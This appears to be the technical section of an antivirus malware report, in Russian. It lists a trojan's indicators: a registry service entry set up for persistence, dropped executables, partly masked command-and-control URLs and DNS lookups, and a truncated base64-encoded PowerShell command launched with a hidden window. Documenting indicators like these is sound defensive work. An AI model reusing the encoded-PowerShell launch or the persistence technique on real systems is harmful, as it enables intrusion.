Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\asptlbfwk] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\asptlbfwk] 'ImagePath' = '"%WINDIR%\SysWOW64\asptlbfwk.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAARgBzAGcAcABiAGMAbwBpACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAFYAYwBjAGkAYQBvAGQAagBjAGkAdwBqACAAIwA+ACAAJABPAGwAbgByAGYAYwBlAHEAYgA9ACcAUgBzAG8AZAB5...
- %HOMEPATH%\38.exe
- %PROGRAMDATA%\ГšВ№Г¬šВ°Г¬Вќ˜Г«ВЄВЁГšВ№Г¬šВµГ«ВҐВё.はてのつつã‚‚ГЈƒВЃ
- %HOMEPATH%\38.exe
- %HOMEPATH%\38.exe в %WINDIR%\syswow64\asptlbfwk.exe
- %HOMEPATH%\38.exe
- '19#.#41.220.155':8080
- http://sa####rajeet.com/cgisimple/vv/
- http://ho####alitimes.com/umo88/oc3w/
- http://19#.###.220.155:8080/prov/symbols/
- DNS ASK sa####rajeet.com
- DNS ASK sa####thomaslaw.com
- DNS ASK ne##.##oridalottery.us
- DNS ASK ho####alitimes.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAARgBzAGcAcABiAGMAbwBpACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAFYAYwBjAGkAYQBvAGQAagBjAGkAdwBqACAAIwA+ACAAJABPAGwAbgByAGYAYwBlAHEAYgA9ACcAUgBzAG8AZAB5...' (со скрытым окном)